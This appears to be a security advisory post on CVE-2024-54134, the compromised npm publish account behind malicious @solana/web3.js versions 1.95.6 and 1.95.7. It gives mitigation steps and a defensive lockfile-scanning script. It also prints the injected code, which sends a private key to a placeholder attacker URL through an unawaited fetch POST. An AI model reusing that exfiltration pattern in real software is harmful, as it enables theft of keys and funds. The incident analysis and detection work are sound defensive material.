CVE-2024-54134: Compromised Publish-Access Account for @solana/web3.js Library Leads to Unauthorized and Malicious Packages

Description: In this post, we will discuss the recent compromise of a publish-access account for the @solana/web3.js library, which led to the publication of unauthorized and malicious packages capable of stealing private keys and draining funds from affected dapps. We will provide code snippets, links to original references, and details on the exploit itself, as well as the steps you should take to protect your Solana app.

The Compromise

On Tuesday, December 3, 2024, between 3:20pm UTC and 8:25pm UTC, an attacker gained access to a publish-access account for the @solana/web3.js library. This JavaScript library is widely used by Solana dapps, and the attacker was able to publish two unauthorized and malicious versions (1.95.6 and 1.95.7) during this time window.

These packages were modified to contain malicious code allowing the attacker to steal private key material and drain funds from dapps handling private keys directly, such as bots. The issue does not affect non-custodial wallets, as they do not expose private keys during transactions.

This compromise is *not* an issue with the Solana protocol itself but rather with a specific JavaScript client library. It only affects projects that directly handle private keys and that updated to the affected versions within the specified time window.

Code Snippet of Affected Package Version

// Malicious block inserted into the key-handling path of the affected versions.
// The length operand is missing from the snippet as published; `0` is assumed here.
if (this._privateKey && this._privateKey.length > 0) {
  // Encode the secret key bytes as base64, then immediately decode them back
  // into a raw byte string so the whole key travels in the request body.
  const privateKeyString = this._privateKey.toString('base64');
  const decodedPrivateKey = atob(privateKeyString);
  try {
    const attackerKey = 'attackerPublicKey'; // placeholder as shown in the published snippet
    const url = '<attackerURL>';             // attacker-controlled endpoint (placeholder)
    // Exfiltrate the key with a fire-and-forget POST. The promise is never awaited,
    // so a failed request is silently dropped and nothing surfaces to the caller.
    fetch(url, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({ privateKey: decodedPrivateKey, attackerKey }),
    });
  } catch (error) {
    console.error('Failed to send private key to the attacker:', error);
  }
}

Detection and Mitigation

The unauthorized versions (1.95.6 and 1.95.7) were detected within hours and have since been unpublished from npm. All Solana app developers should immediately upgrade to version 1.95.8:

npm install @solana/web3.js@1.95.8

If you suspect your app might have been compromised, you should rotate any suspect authority keys, including multisigs, program authorities, server keypairs, and so on.
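The practical check after reading the section above is whether any copy of the library in a project's dependency tree, nested copies included, sits at 1.95.6 or 1.95.7, since a transitive dependency can pin its own copy even when the top-level one is already at 1.95.8. The following Node script is an added example, not code from this advisory or from the Solana project. It reads a parsed package-lock.json, handling the flat `packages` map of lockfile v2/v3 and the nested `dependencies` tree of lockfile v1, and reports every affected path. The lockfile it scans by default is constructed inline, and the `example-sdk` package and the `scan-lock.js` filename are hypothetical.

```javascript
// Added example, not code from the advisory or the Solana project: scan a parsed
// npm package-lock.json for installed copies of @solana/web3.js at one of the two
// unauthorized versions (1.95.6, 1.95.7) and report where they sit in the tree.
// Usage (filename hypothetical):  node scan-lock.js ./package-lock.json

const AFFECTED_PACKAGE = '@solana/web3.js';
const AFFECTED_VERSIONS = new Set(['1.95.6', '1.95.7']);
const FIXED_VERSION = '1.95.8';

// Collect every installed copy of `name` as { path, version }.
// lockfileVersion 2/3: "packages" is a flat map keyed by node_modules path.
// lockfileVersion 1:   "dependencies" is a nested tree, walked recursively.
function collectVersions(lock, name) {
  const found = [];
  if (lock.packages) {
    for (const [path, meta] of Object.entries(lock.packages)) {
      if (path === `node_modules/${name}` || path.endsWith(`/node_modules/${name}`)) {
        found.push({ path, version: meta.version });
      }
    }
  } else if (lock.dependencies) {
    walkV1Tree(lock.dependencies, name, 'node_modules', found);
  }
  return found;
}

function walkV1Tree(deps, name, prefix, found) {
  for (const [depName, meta] of Object.entries(deps)) {
    const path = `${prefix}/${depName}`;
    if (depName === name) found.push({ path, version: meta.version });
    if (meta.dependencies) walkV1Tree(meta.dependencies, name, `${path}/node_modules`, found);
  }
}

// Only the copies at an unauthorized version. A nested copy pulled in by another
// dependency is as dangerous as a top-level one, so every path is checked.
function findCompromised(lock) {
  return collectVersions(lock, AFFECTED_PACKAGE).filter((e) => AFFECTED_VERSIONS.has(e.version));
}

// Human-readable summary, returned as lines so callers can log or assert on them.
function summarize(lock) {
  const hits = findCompromised(lock);
  if (hits.length === 0) {
    return [`OK: no ${AFFECTED_PACKAGE} at ${[...AFFECTED_VERSIONS].join('/')} found`];
  }
  const lines = hits.map((h) => `COMPROMISED: ${h.path} is ${AFFECTED_PACKAGE}@${h.version}`);
  lines.push(`Upgrade every copy to ${FIXED_VERSION} (npm install ${AFFECTED_PACKAGE}@${FIXED_VERSION}) and rotate keys`);
  return lines;
}

// Constructed sample lockfile (v3): the top-level copy is already fixed, but a
// hypothetical helper SDK carries its own nested copy at a malicious version.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'example-trading-bot', version: '1.0.0' },
    'node_modules/@solana/web3.js': { version: '1.95.8' },
    'node_modules/example-sdk': { version: '2.0.0' },
    'node_modules/example-sdk/node_modules/@solana/web3.js': { version: '1.95.7' },
  },
};

// When run directly with a lockfile path, scan that file; otherwise scan the sample.
let lockToScan = SAMPLE_LOCK;
if (typeof process !== 'undefined' && process.argv && process.argv[2] && typeof require === 'function') {
  try {
    lockToScan = JSON.parse(require('fs').readFileSync(process.argv[2], 'utf8'));
  } catch (err) {
    console.error(`Could not read ${process.argv[2]}, scanning the built-in sample instead:`, err.message);
  }
}
for (const line of summarize(lockToScan)) console.log(line);
```

Running it against the constructed sample reports the nested `example-sdk` copy at 1.95.7 even though the top-level install is clean, which is exactly the case `npm ls @solana/web3.js` output is easy to skim past. The same scan applies to any lockfile the project ships; a hit means the package was installed from the registry inside the compromise window, and the key-rotation steps above apply regardless of whether the malicious path was ever executed.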

References

- Original Solana GitHub Issue
- Solana Incident Response Report
- 1.95.8 Patch Release Notes

Exploit Details

The attacker modified the @solana/web3.js package to include the code shown above, which sends the user's private key to a specified attacker-controlled URL. Once the attacker has the private key, they can drain funds from affected dapps.

Conclusion

This CVE-2024-54134 compromise of a publish-access account for the @solana/web3.js library highlights the importance of proper access controls and monitoring for third-party packages. It serves as a reminder to always verify the integrity of the packages you're using and to keep an eye on your dependencies. By following the provided mitigation steps, affected Solana projects can safeguard their funds and keep their dapps secure.

Timeline

Published on: 12/04/2024 16:15:26 UTC